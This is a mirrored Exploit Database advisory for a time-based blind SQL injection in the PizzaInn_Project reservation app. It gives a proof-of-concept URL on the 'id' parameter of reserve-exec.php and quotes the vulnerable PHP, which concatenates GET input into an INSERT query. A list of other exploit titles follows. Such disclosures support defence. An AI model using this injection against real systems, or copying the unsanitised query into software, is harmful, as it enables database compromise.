PizzaInn_Project – SQL Injection

Exploit Database
10 阅读

作者： vinicius777

日期： 2014-01-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/31143/

##########################################################################
[+] Exploit: PizzaInn_Project - SQL Injection#
[+] Author: vinicius777					 #
[+] Contact: vinicius777 [AT] gmail@vinicius777_ #	 
[+] Vendor Homepage: http://sourceforge.net/projects/restaurantmis/	 #
##########################################################################


 
[1] Sql Injection Time Based Blind

PoC:http://127.0.0.1/reserve-exec.php?id=1' [SQL Injection]


Vulnerable Code:
[+] reserve-exec.php


$id = $_GET['id'];
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry)



#
#
# Greetz to g0tm1lk and TheColonial.

last Exploits
PizzaInn_Project – SQL Injection的更多信息

Pligg CMS 1.0.4 – SQL Injection / Cross-Site Scripting：
BMC Remedy Knowledge Management 7.5.00 – Default Account / Multiple Cross-Site Scripting Vulnerabilities：
WordPress Plugin Ajax Pagination 1.1 – Local File Inclusion：
Flippa Website Script – SQL Injection：
Roxy Fileman 1.4.5 – Unrestricted File Upload / Directory Traversal：
phpDealerLocator – Multiple SQL Injections：
Trixbox 2.8.0.4 – ‘lang’ Path Traversal：
Zuz Music 2.1 – ‘zuzconsole/___contact ‘ Persistent Cross-Site Scripting：